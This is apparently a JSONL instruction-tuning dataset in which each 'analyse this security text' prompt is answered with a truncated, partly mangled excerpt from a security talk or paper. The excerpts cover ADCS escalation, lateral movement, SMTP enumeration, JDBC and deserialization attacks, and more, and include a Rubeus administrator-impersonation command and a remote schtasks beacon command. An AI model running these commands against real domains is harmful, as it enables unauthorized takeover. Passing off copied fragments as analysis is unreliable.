为所有要求身份验证的访问内容和所有其他的敏感信息提供加密传输 接受任何证书的TrustManager 接受任何签名证书的HostnameVerifier 第十六条 使用可信的密码算法 如果应用程序需要加密数字签名密钥交换或者安全散列应使用国密算法 禁止使用弱加密 可预测的伪随机数生成器 错误的十六进制串联 第十七条 禁止在日志话单cookie等文件中记录口令银行账号通信内容等敏感数据 应用程序应该避免将用户的输入直接记入日志话单cookie等文件同时对需要记入的数据 进行校验和访问控制 不受信任的会话Cookie值 日志伪造 HTTP响应截断 第十", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: iSMTP categories: Information Gathering tags: [recon,smtp,sniffing,spoofing,information gathering,kali linux,ismtp] date: 2017-04-23 09:13:00 --- 0x00 介绍 ------- 测试SMTP用户枚举RCPT TO和VRFY内部欺骗和转发 <!--more--> [主页][1] | [仓库][2] - 作者Alton Johnson - 证书GPLv2 0x01 功能 ismtp - SMTP用户枚举和测试工具 ------- ```plain root@kali:~# ismtp --------------------------------------------------------------------- iSMTP v1.6 - SMTP Server Tester, Alton Johnson (alton.jx@gmail.com) --------------------------------------------------------------------- 用法: ./iSMTP.py <选项> 必需: -f <import file> 导入用于测试的SMTP服务器列表(不能同时使用'-h') -h <host> 目标IP和端口(格式 IP:port)(不能同时使用'-f') 欺骗: -i <isa email> 互联网安全加速(Internet Security and Acceleration,ISA)电子邮件地址 -s <sndr email> 发件人电子邮件地址 -r <rcpt email> 收件人电子邮件地址 --sr <email> 指定发件人和收件人电子邮件地址 -S <sndr name> 发件人姓名 -R <rcpt name> 收件人姓名 --SR <name> 指定发件人和收件人姓名 -m 启用SMTP欺骗测试 -a 附带欺骗邮件的.txt附件 SMTP枚举: -e <file> 启用SMTP用户枚举测试并导入电子邮件列表 -l <1|2|3> 指定枚举类型(1 = VRFY, 2 = RCPT TO, 3 = all).(默认第3种) SMTP转发: -i <isa email> 互联网安全加速(Internet Security and Acceleration,ISA)电子邮件地址 -x 启用SMTP外部转发测试 其他: -t <secs> 超时值(Default is 10.) -o 创建ismtp-results目录并将输出写入到ismtp-results/smtp_<service>_<ip>(port).txt 注意支持任何选项的组合例如枚举转发两者组合所有组合等 ``` 0x02 示例 ------- Test a list of IPs from a file (-f smtp-ips.txt) enumerating usernames from a dictionary file (-e /usr/share/wordlists/metasploit/unix_users.txt): 从一个IP列表文件-f smtp-ips.txt中枚举来自字典文件-e /usr/share/wordlists/metasploit/unix_users.txt的用户 ```plain root@kali:~# ismtp -f smtp-ips.txt -e /usr/share/wordlists/metasploit/unix_users.txt --------------------------------------------------------------------- iSMTP v1.6 - SMTP Server Tester, Alton Johnson (alton.jx@gmail.com) --------------------------------------------------------------------- Testing SMTP server [user enumeration]: 192.168.1.25:25 Emails provided for testing: 109 Performing SMTP VRFY test... [-] 4Dgifts ------------- [ invalid ] [-] EZsetup ------------- [ invalid ] [+] ROOT ---------------- [ su", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在ADCS中错误配置会导致普通域用户到域管理员的提权主要体现在证书模板这里在 证书模板中我们可以设置应用程序的策略 我们比较关心的如下 1 Client Authentication (OID 1.3.6.1.5.5.7.3.2) 2 PKINIT Client Authentication (1.3.6.1.5.2.3.4) 3 Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2) 4 Any Purpose (OID 2.5.29.37.0) 这些可以使得我们拥有请求票据的功能然后就是SAN的模拟SAN允许我们使用UPN来 指定用户来达到用户模拟的目的 其LDAP查询语句如下 1 (&(objectclass=pkicertificatetemplate)(!(mspkienrollmentflag:1.2.840.113 556.1.4.804:=2))(|(mspkirasignature=0)(!(mspkirasignature=*)))(|(pkiexte ndedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextend edkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4) (pkiexte ndedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificatename flag:1.2.840.113556.1.4.804:=1)) 使用其发布的测试工具PSPKIAudit测试显示存在ESC1漏洞 攻击步骤 首先申请一张证书并将upn名称改成域管 然后导出证书 用密码导出 然后使用rubeus攻击 1 Rubeus.exe asktgt /user:administrator /certificate:3.pfx /password:123456 /ptt /user模拟的账户 /certificate申请的证书 /password证书密码 成功获取域控权限", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1\" 反击恶意软件: 源头做起不不挖坑 DEF\"CON\"CHINA\"1.0\"(2019)\" DEF CON CHINA 1.0 (2019) by Alexandre Borges ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" DEF\"CON\"CHINA\"1.0\"(2019)\" 2\" ü Malware and Security Researcher. \" ü Speaker at DEFCON USA 2018 ü Speaker at HITB 2019 Amsterdam ü Speaker at CONFidence Conf. 2019 ü Speaker at BSIDES 2018/2017/2016 ü Speaker at H2HC 2016/2015 ü Speaker at BHACK 2018 ü Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics and Rookits. \" ü Reviewer member of the The Journal of Digital Forensics, Security and Law.\" ü R f Di i l 目录: \" v 介绍 v 反逆向和虚拟封装器器 v METASM v MIASM v DTRACE on Windows v 反虚拟化 v 结论 ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" 介绍 DEF\"CON\"CHINA\"1.0\"(2019)\" 3\" ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" DEF\"CON\"CHINA\"1.0\"(2019)\" 4\" ü 我们日常处理理的恶意软件样本中都会使用几个已知的包例例如ASPack, Armadillo, Petite, FSG, UPX, MPRESS, NSPack, PECompact, WinUnpack 等等. 他们中的大多数很容 易易用一个脚本来解压缩 ü 我们也知道一些经常用来创建和分配内存的API例例如 ü VirtualAlloc/Ex( ) ü HeapCreate( ) / RtlCreateHeap( ) ü HeapReAlloc( ) ü GlobalAlloc( ) ü RtlAllocateHeap( ) ü 此外我们还知道如何使用调试器器断点和从内存中转储未打包的内容来解压缩 它们来自Hasherezade的pe-sieve非常优秀J ü 当我们意识到恶意软件使用了了一些定制的打包技术时仍然可以从内存中转储它 用Python代码修复ImageAddress字段并在IDA Pro中使用impscan插件对各自的IAT进 行行分析: ü export VOLATILITY_PROFILE=Win7SP1x86 ü python vol.py -f memory.vmem procdump -p 2096 -D . --memory (to keep slack space) ü python vol.py -f memory.vmem impscan --output=idc -p 2096 ALEXANDRE\"BORGES\"\"MALWARE\"AND\"SECURITY\"RESEARCHER\" DEF\"CON\"CHINA\"1.0\"(2019)\" 5\" //############################################################# // 文件名字 : dumpexe.txt (first draft) // 注释 : 转储包含可执行行程序的内存段 // 作者 : Alexandre Borges // 日期 : today //############################################################# entry: msg \"转储包含可执行行程序的模块.\" msg \"在继续之前您必须在EP\" bc // 清楚已有断点 bphwc // 清楚已有硬件断点 bp VirtualAlloc // 在VirtualAlloc设置断点 erun // 运行并将所有的第一个异常传递给应用程序 core: sti // 单步执行行 sti // 单步执行行 sti // 单步执行行 sti // 单步执行", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nImproving Web Vulnerability Scanning Daniel Zulla 1 Introduction Hey!  Hi there!  Im Dan. This is my first year at DEFCON.  I do programming and security start-ups.  I do some penetration testing as well 2 More Introduction  Today Im going to talk about vulnerability scanning  Primary on the web  The cloud is involved as well  Network security too  Ill show some things, so there is plenty of demo time  Have fun, thanks for being here! 3 Some Facts  There are a lot of web vulnerability scanners, fuzzers and penetration testing tools out there already  Some of them work, some of them do not  But basically all of them have one thing in common: They actually dont attack web applications on the application layer  They mostly fuzz HTTP and sometimes perform injection attacks 4 Some more facts  The fundamental design of web scanners has not changed in over a decade  But: The web has changed.  So there seems to be a problem. 5 Software Architecture What web vulnerability scanners and fuzzers look like 6 The Core Output Engine RXSS PXSS SQL BSQLI LFI RFI EVAL OSC [...] A HTTP Library Multithreading / Forking Plugins A pentesters point of view 7  Javascript/Ajax rich applications are still not supported  Authenticated scanning is still incredibly challenging / not reliable  Exploitation techniques are mostly poor  I dont know which scanner will work for foo.com and which one for bar.com, so I use toolchains A developers point of view  HTTP Libraries dont support JS - Scanners are based on an HTTP Libraries  Web Logins are not standarized - So how should they be detected  No time for exploits (Already spent 100000 lines [and nights] of code making the crawler immune to encoding issues, malformed HTML, redirects and binary content!)  A false positive is better than a false negative 8  Javascript/Ajax rich applications are still not supported  Authenticated scanning is still incredibly challenging / not reliable  Exploitation techniques are mostly poor  I dont know which scanner ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Commercial Malware Industry Peter Gutmann University of Auckland Some History: The Numbers Racket The numbers racket = Lotto before the government took it over  Run through barber shops, groceries by local operators  Bets were for cents  Players chose a 3-digit number  Drawn using the last 3 digits of the total amount bet on pari- mutuel racetrack betting machines Seen as a harmless vice, no-one paid much attention to it Some History: The Numbers Racket (ctd) Then organised crime moved in  Dutch Schultz took over from existing operators  They werent career criminals and were intimidated by explicit death threats Dutch hired mathematician Otto Aba Daba Berman to fix the numbers racket  Ensure that heavily-played numbers never won  No-one had ever considered this level of attack  c.f. spammers hiring professional linguists  We cant repel firepower of that magnitude Some History: The Numbers Racket (ctd) Once organised crime got involved, everything changed The modern spam industry now is spread across the globe and has become infested by technically organised programmers from Russia and Eastern Europe, often in league with local organised crime syndicates  Colin Galloway, Asia Times Most of the big outbreaks are professional operations. They are done in an organised manner from start to finish  Mikko Hypponen, F-Secure Last year [2004] was the first year that proceeds from cybercrime were greater than proceeds from the sale of illegal drugs [] cybercrime is moving at such a high speed that law enforcement cannot catch up with it  Valerie McNiven, US Treasury advisor on cybercrime The Malware Industry Publicity virus: Written by bored script kiddies  Poorly tested, often barely works Spam/phishing virus: Written by paid professional programmers  Well-tested, can be quite sophisticated  The Babylonia virus used plug-in virus modules (VMODs) downloaded on-demand by the virus body  The Hybris worm uses digitally-signed encrypted updates propagated via web servers and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnalysis of Mutation and Generation-Based Fuzzing Whitepaper Charlie Miller and Zachary N. J. Peterson Independent Security Evaluators www.securityevaluators.com March 1, 2007 c Independent Security Evaluators 2007. All rights reserved Analysis of Mutation and Generation-Based Fuzzing 1 Abstract We present a study of two methods of dynamic application analysis: mutation-based fuzzing and generation-based fuzzing. We quantify the differences of these methods by measuring the amount of executed code required to parse PNG image files. Results indicate that generation-based fuzzing can execute 76% more code when compared to mutation-based methods. 1 Introduction Intelligent fuzzing usually gives more results.  Ilja van Sprundel[8] Dynamic analysis, or fuzzing, is a popular method of finding security vulnerabilities in software [10]. Fuzzing may be used by a developer to find potential problems as part of the quality-assurance process. Likewise, a fuzzer may be used to find potential exploits in an existing soft- ware application. The technique of fuzzing consists of sending a large volume of different inputs into a program in an attempt to make the program perform in a manner that was not intended. Fuzzing may result in memory corruption, a program crash, extreme resource usage, etc. Such incidents may be exploited to cause a denial of ser- vice or even allow an attacker to execute arbitrary code in the context of the application. Fuzzing has grown in popu- larity because it is much easier (and often more effective) to generate and run arbitrary inputs than it is to perform a manual code audit or use software reverse engineering. One of the most important aspects of successfully find- ing vulnerabilities by fuzzing is the quality and quantity of the fuzzed inputs. These inputs, or test cases, are nor- mally constructed in one of two fashions. In the first method, called mutation-based fuzzing, known good data is collected (files, network traffic, etc) and then modified; modificat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n7/7/13 IPython Notebook localhost:8888/a1253220-71b8-49cd-bd84-1d0edbd6bd60/print 1/7 In [56]: In [57]: High level stats In [58]: Epoc to datetime In [60]: In [61]: Device discovery over time In [62]: import pandas import json import os import datetime #the following is the path to your client json files data_path=\"../../data/json_archive\" has_json_ext = lambda x: True if os.path.splitext(x)[-1] == \".json\" else False data_list=[] for path, deeper_dirs, filenames in os.walk(data_path): for filename in filter(has_json_ext, filenames): f = open(os.path.join(path, filename), 'r') json_data = json.load(f) f.close() data_list.append(json_data) df = pandas.DataFrame(data_list) uniq_devs = df[\"bluetoothAddress\"].nunique() total_entries = len(df) print \"%-25s %-25s\" % (\"Uniq Devs:\", uniq_devs) print \"%-25s %-25s\" % (\"Total Sightings:\", total_entries) Uniq Devs: 2489 Total Sightings: 9362 epoc_to_datetime = lambda x:datetime.datetime.fromtimestamp(float(x)) df[\"timestamp\"] = df.timestamp.apply(epoc_to_datetime) df.head() Out[61]: <class 'pandas.core.frame.DataFrame'> Int64Index: 5 entries, 0 to 4 Data columns (total 10 columns): bluetoothAddress 5 non-null values bluetoothName 5 non-null values clientType 0 non-null values clientVersion 0 non-null values deviceMajor 0 non-null values deviceMinor 0 non-null values latatude 5 non-null values longitude 5 non-null values timestamp 5 non-null values type 0 non-null values dtypes: datetime64[ns](1), float64(3), object(6) all_devs = df[[\"timestamp\"]] all_devs.sort(\"timestamp\") all_devs = all_devs.set_index(\"timestamp\") all_devs[\"total\"] = 1 all_devs[\"total\"] = all_devs.total.cumsum() fig = all_devs.plot(figsize=(15,5)) fig.set_title(\"Cumulitive sightings over time\") Out[62]: <matplotlib.text.Text at 0x1087b4a50> 7/7/13 IPython Notebook localhost:8888/a1253220-71b8-49cd-bd84-1d0edbd6bd60/print 2/7 In [63]: In [64]: Unique discovery over time In [65]: all_devs = df[[\"timestamp\"]] all_devs[\"timestamp\"] = df.timestamp.apply(lambda x: x.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUNORTHODOX LATERAL MOVEMENT: STEPPING AWAY FROM STANDARD TRADECRAFT > ldapsearch (displayname=Riccardo Ancarani) sAMAccountname: Rancarani displayname: Riccardo Ancarani memberOf: @APTortellini, WithSecure/F-Secure security certifications: who cares really  Lateral Movement is the act of using authentication material to execute code on another host  Ubiquitous in red team engagements and real-life attacks  EDR and well-trained SOCs are making this harder  we must improve  We need to find new techniques to stay on top of our game PREMISE OF THE TALK As we go trough the techniques, we will also classify them using the following metrics: PREMISE OF THE TALK Filesystem Artefacts Host Artefacts Network Artefacts Prevalence - IoC Uploads a Binary on Disk Creates Additional Artefacts Directly connect to create and trigger the task Well known technique  IoC Available Modifies Existing Artefacts on Disk Modifies an Existing Object No Direct Connection Less known technique or Modified Technique None None Unknown Technique This simple and intentionally incomplete traffic light system will help us taking more informed decisions while choosing a lateral movement technique. Examples: PREMISE OF THE TALK Filesystem Artefacts Host Artefacts Network Artefacts Prevalence - IoC Default PsExec Uploads a Binary in ADMIN$ Creates a Service Directly connect to create and trigger the service Well known technique  IoC Available RPC BASED EXECUTION METHODS  Remote Procedure Calls (RPC) is a client-server communication mechanism.  Allows clients to invoke methods on a server.  Used everywhere in Windows. RPC https://specterops.io/assets/resources/RPC_for_Detection_Engineers.pdf In this section we will mostly rely on:  Task Scheduler  Service Control Manager  Remote Registry RPC RPC TASK SCHEDULER Tasks can be created remotely via RPC. The old classic that we should all avoid (BOOOOOORING): beacon> shell schtasks /CREATE /TN code /TR \"C:\\Windows\\beacon.exe\" /RU \"SYSTEM\" /ST 15:33 /S HOST RPC T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Episode 5: Challenge 1 ## Description > Piece together the images to get a clearer picture. > > Hint: I wonder if those toys from the 90's are still alive. A binary file was attached. ## Solution Let's take a look at the binary file: ```console (user@kali)-[/media//h4ck1ng.google/EP005/Challenge_01/a] $ file challenge.bin challenge.bin: data (user@kali)-[/media//h4ck1ng.google/EP005/Challenge_01/a] $ xxd -g 1 challenge.bin | head 00000000: 30 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0............... 00000010: 00 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 03 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 03 0f 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 ................ 00000060: 30 00 00 03 30 00 00 54 01 50 00 03 33 00 00 0c 0...0..T.P..3... 00000070: 0c 00 00 05 05 00 00 00 30 00 00 0c 0c 00 00 15 ........0....... 00000080: 55 40 00 0f cf c0 00 03 30 00 00 10 00 40 00 00 U@......0....@.. 00000090: 30 00 00 00 c0 00 00 11 04 40 00 03 33 00 00 00 0........@..3... ``` Not much to work with. No known format. The hint talks about a 90's game which might be still alive, and the episode features a hacker named Natalie Silvanovich which loves hacking Tamagotchi devices. Searching for related info online, we come across the [Egg-Shell repository](https://github.com/natashenka/Egg-Shell), which is maintained by Natalie and contains some Tamagotchi Development Tools. Specifically, we find a script called [portrait.py](https://github.com/natashenka/Egg-Shell/blob/master/portrait/portrait.py) which does some conversions between a bitmap and a custom image format. It's not exactly the same, but it seems similar enough to give us an idea about what's going on: * The first two bytes are width (`48`) and height (`31`). This gives us `48 * 31 = 1488` pixels. * Each pixel is enc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to hack your way out of home detention About me  William @Amm0nRa Turner  @Assurance Disclaimer:  I own this system (and 0wn it)  The following information is for academic purposes only  Dont use this for evil  If you do, you may go to jail Home Detention Systems  I own this system (and 0wn it)  Used to monitor 'low risk' criminals in their homes. e.g.:  Woman gets home detention in green card immigration scheme [October 2014, Los Angeles]  Private investigator who hacked email gets 3 months jail, 6 months home detention [June 2015, New York] How home detention systems work  Older systems ran over phone lines, used RF for anklet bracelet proximity  Newer systems use GPS, cell network as well as short range RF In America  On a normal day some 200,000 people wake up with a black plastic box strapped to their leg  James Kilgore, 2012  Very hard to even get info  Social Engineered a 'sample' unit out of a Taiwan manufacturing company for ~$1k - GWG International Inc  Different states/police forces use different trackers, difficult to know if/where this unit is used in the USA.  Other trackers probably have at least some of the same vulns  Lacked detailed manuals - found car tracking system running same 'OS (GS-818 - SAN JOSE TECHNOLOGY, INC) Getting hold of one Operation  GPS for location, home base unit with short range RF, tamper detection  Battery life depends on configuration, can be recharged without removing anklet  Base unit also has battery to deal with power outages  Communicates over SMS or GPRS (TCP socket) with server  Accepts commands to change settings  username and password The System  base unit The System  base unit Internals Teardown Anklet Anklet: JTAG Header(?) Anklet Internals Cinterion MC551 K9F5608U0D vibration motor Anklet Internals M430F5418 434.01MHz Module Operation  Interesting commands/features which can be set/enabled/triggered: username password network APN SMS-TCP mode SMS numbers status report interval Geo-Fence coords buzzer vibratio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Night the Lights went out in Vegas: Demystifying Smart Meter Networks Barrett Weisshaar Garret Picchioni Copyright Trustwave 2010 Confidential Overview What this Presentation is:  Overview of Smart Meter & Smart Grid technology  Detail network traffic-based approach  As opposed to meter firmware modification  Concepts/Protocols/Etc.  Caveat: We're just pentesters and network geeks, not RF/ SCADA/Hardware gods Copyright Trustwave 2010 Confidential Overview What this Presentation is NOT:  How to pwn the Smart Grid/Smart Meters  How to get free power  How to black out Las Vegas Copyright Trustwave 2010 Confidential What is Smart Metering? First, a brief history lessonfirst generation meters! Copyright Trustwave 2010 Confidential What is Smart Metering? Second Generation one way meters: Copyright Trustwave 2010 Confidential What is Smart Metering? Third Generation Meters  Automated Metering Infrastructure: Source: Galley Eco Capital Copyright Trustwave 2010 Confidential Why?  Utility  Reduce staff overhead (for better or worse)  Remote Start/Stop Service  Demand Forecasting, demand pricing ($$)  Remote flash upgrades/diagnostics  Customer  Monitor/track consumption  Opt-in for \"smart appliances\" (we'll get to that)  (in theory...) equal or reduced costs. Copyright Trustwave 2010 Confidential Smart Meter 101  What utility types are using Smart Meters?  All of them: Gas, Water, & Electric  Typical Smart Meter Hardware  32-bit ARM Processor (or similar)  256k RAM (yes k)  512k Flash memory  Transceiver (we'll get to that)  Communication method (usually over TCP/IP) Case Studies: Smart Meter Network Types (The Tubez) Copyright Trustwave 2010 Confidential Example 1: Licensed Spectrum  900MHz licensed band  Frequency-hopping spread spectrum (FHSS)  Hybrid star/mesh network  Advantages  Reliability  Longevity (as long as the band license is renewed)  Disadvantages  Overhead  Proprietary System Copyright Trustwave 2010 Confidential Example 2: Existing 3rd Party Network  GPR", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nod === 输出文件的八进制十六进制等格式编码的字节 ## 补充说明 **od命令** 用于输出文件的八进制十六进制或其它格式编码的字节通常用于显示或查看文件中不能直接显示在终端的字符 常见的文件为文本文件和二进制文件此命令主要用来查看保存在二进制文件中的值比如程序可能输出大量的数据记录每个数据是一个单精度浮点数这些数据记录存放在一个文件中如果想查看下这个数据这时候od命令就派上用场了在我看来od命令主要用来格式化输出文件数据即对文件中的数据进行无二义性的解释不管是IEEE754格式的浮点数还是ASCII码od命令都能按照需求输出它们的值 ### 语法 ```shell od(选项)(参数) ``` ### 选项 ```shell -a此参数的效果和同时指定-ta参数相同 -A<字码基数>选择以何种基数计算字码 -b此参数的效果和同时指定-toC参数相同 -c此参数的效果和同时指定-tC参数相同 -d此参数的效果和同时指定-tu2参数相同 -f此参数的效果和同时指定-tfF参数相同 -h此参数的效果和同时指定-tx2参数相同 -i此参数的效果和同时指定-td2参数相同 -j<字符数目>或--skip-bytes=<字符数目>略过设置的字符数目 -l此参数的效果和同时指定-td4参数相同 -N<字符数目>或--read-bytes=<字符数目>到设置的字符树目为止 -o此参数的效果和同时指定-to2参数相同 -s<字符串字符数>或--strings=<字符串字符数>只显示符合指定的字符数目的字符串 -t<输出格式>或--format=<输出格式>设置输出格式 -v或--output-duplicates输出时不省略重复的数据 -w<每列字符数>或--width=<每列字符数>设置每列的最大字符数 -x此参数的效果和同时指定-h参数相同 --help在线帮助 --version显示版本信息 ``` ### 参数 文件指定要显示的文件 ### 实例 ```shell [linuxde@localhost ~]$ echo abcdef g > tmp [linuxde@localhost ~]$ cat tmp abcdef g ``` 说明先准备一个tmp文件 ```shell [linuxde@localhost ~]$ od -b tmp 0000000 141 142 143 144 145 146 040 147 012 0000011 ``` 说明使用单字节八进制解释进行输出注意左侧的默认地址格式为八字节 ```shell [linuxde@localhost ~]$ od -c tmp 0000000 a b c d e f g \\n 0000011 ``` 说明使用ASCII码进行输出注意其中包括转义字符 ```shell [linuxde@localhost ~]$ od -t d1 tmp 0000000 97 98 99 100 101 102 32 103 10 0000011 ``` 说明使用单字节十进制进行解释 ```shell [linuxde@localhost ~]$ od -A d -c tmp 0000000 a b c d e f g \\n 0000009 ``` 说明设置地址格式为十进制 ```shell [linuxde@localhost ~]$ od -A x -c tmp 000000 a b c d e f g \\n 000009 ``` 说明设置地址格式为十六进制 ```shell [linuxde@localhost ~]$ od -j 2 -c tmp 0000002 c d e f g \\n 0000011 ``` 说明跳过开始的两个字节 ```shell [linuxde@localhost ~]$ od -N 2 -j 2 -c tmp 0000002 c d 0000004 ``` 说明跳过开始的两个字节并且仅输出两个字节 ```shell [linuxde@localhost ~]$ od -w1 -c tmp 0000000 a 0000001 b 0000002 c 0000003 d 0000004 e 0000005 f 0000006 0000007 g 0000010 \\n 0000011 ``` 说明每行仅输出1个字节 ```shell [linuxde@localhost ~]$ od -w2 -c tmp 0000000 a b 0000002 c d 0000004 e f 0000006 g 0000010 \\n 0000011 ``` 说明每行输出两个字节 ```shell [linuxde@localhost ~]$ od -w3 -b ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMake JDBC Attack Brilliant Again Xu Yuanzhen( @pyn3rd) Chen Hongkun( @Litch1) 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda Agenda 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda Agenda Java Database Connectivity JDBCMysqlImpl MySQL JDBC JDBCOracleImpl JDBCSQLServerImpl JDBCDB2mpl Oracle MsSQL DB2 JDBC Driver Standard Interface Callback Java Application Not Recommended Unportable Callback set evil JDBC URL establish JDBC connection execute payload with JDBC driver Controllable JDBC URL Class.forName(\" com.mysql.cj.jdbc.Driver\"); String url = \"jdbc:mysql://localhost:3306/demo\" Connection conn = DriverManager.getConnection(url) 1.The derivation of JDBC attacking 2.In-depth analysis of occurred implementations 3.Set fire on JDBC of diverse applications Agenda Agenda MySQL client arbitrary file reading vulnerability  Affect many clients including JDBC driver  LOAD DATA INFILE statement establish JDBC connection greeting packet query packet file transfer packet Server Client MySQL JDBC client deserialization vulnerability establish JDBC connection read evil object from server deserialize evil object  Affected MySQL JDBC driver need to support specific properties  gadgets are necessary Server Client MySQL Connector/J  CVE-2017-3523 MySQL Connector/J offers features to support for automatic serialization and deserialization of Java objects, to make it easy to store arbitrary objects in the database  The flag \"useServerPrepStmts\" is set true to make MySQL Connector/J use server-side prepared statements  The application is reading from a column having type BLOB, or the similar TINYBLOB, MEDIUMBLOB or LONGBLOB  The application is reading from this column using .getString() or one of the functions reading numeric values (which are first read as strings and then parsed as numbers). case Types.LONGVARBINARY: i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n编码规范之 phpmailer 的安全隐患 By:奥村燐 1.众所周知,phpMailer 是一个非常强大的 php 发送邮件类,可以设定发送邮件地址回复 地址邮件主题html 网页,上传附件,并且使用起来非常方便 2.但是如果开发编码不规范可能会导致安全问题的出现下面实例讲解在什么场景下会 出现安全隐患 3.例如 eyoucms 找回密码,点击发送的时候,会调用 Smtpmail 控制器的 send_email 方法 4. 然后又在 send_email 方法中调用了 SmtpmailLogic.php 文件中的 send_email 5.最后在 SmtpmailLogic.php 最后又调用了 send_email 6.然后又在 common.php 中 send_email 方法中实例化了 EmailLogic,调用了其中的 send_email 方法 7.最后又来到了 EmailLogic.php 中 send_email 方法默认发送邮件会调用 phpmailer 类 8.不规范的写法就在 send_phpmailer 中例如下面这样开发为了方便群发把收件人以 逗号进行分割最后通过数组通过 addAddress 方法添加到收件人了 9.知道这样我们可以构造收件人 email=601333824@qq.com,futianyu501@2980.com 10.然后访问地址会提示邮箱地址不存在 11.原因也很简单因为找回密码 type 会等于 retrieve_password 去判断邮箱是否存在 12.但是 type=bind_email 的时候邮箱不存在是可以通过验证的,这个验证码也是可以用来 找回密码的构造链接访问 url 提示发送成功 13.由于是群发两个邮箱可以收到同一个验证码 14.找回密码测试用 601333824@qq.com 邮箱的验证去找回 futianyu501@2980.com 的验证码 15.最后成功重置验证码 16.这个只是其中一个案例不安全的编码会产生很可怕的安全隐患", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJuly 2017 HPE Software Security Research Paper Introduction Security issues with deserialization of untrusted data in several programming languages have been known for many years. However, it got major attention on 2016 which will be remembered as the year of Java Deserialization apocalypse. Despite being a known attack vector since 2011, the lack of known classes leading to arbitrary code execution in popular libraries or even the Java Runtime allowed Java Deserialization vulnerabilities fly under the radar for a long time. These classes could be used to execute arbitrary code or run arbitrary processes (remote code execution or RCE gadgets). In 2015 Frohoff and Lawrence published an RCE gadget in the Apache Commons- Collections library 1 which was used by many applications and therefore caught many applications deserializing untrusted data off-guard. The publication of the Apache Commons-Collections gadget was followed by an explosion of new research on gadgets, defense and bypass techniques and by the hunting of vulnerable products/endpoints. The most obvious solution proposed at that time to mitigate the growing number of vulnerable applications was to stop using Java serialization altogether which involved replacing it with something else. Several security experts including ourselves pointed at secure JSON libraries as a viable alternative 2 since some XML parsers were also known to be vulnerable and JSON was still free of known RCE vectors. Our research showed that the main requirements for successful RCE attacks on unmarshalling libraries are that: 1) The library invokes methods on user-controlled types such as non-default constructors, setters, deserialization callbacks, destructors, etc. 2) The availability of a large gadget space to find code which logic could be abused by the attacker to craft his/her payloads. As we will conclude, the format used for the serialization is not relevant. It can be binary data, text such as XML, JSON or even custom binary fo", "category": "text_analysis", "source": "security_papers"}
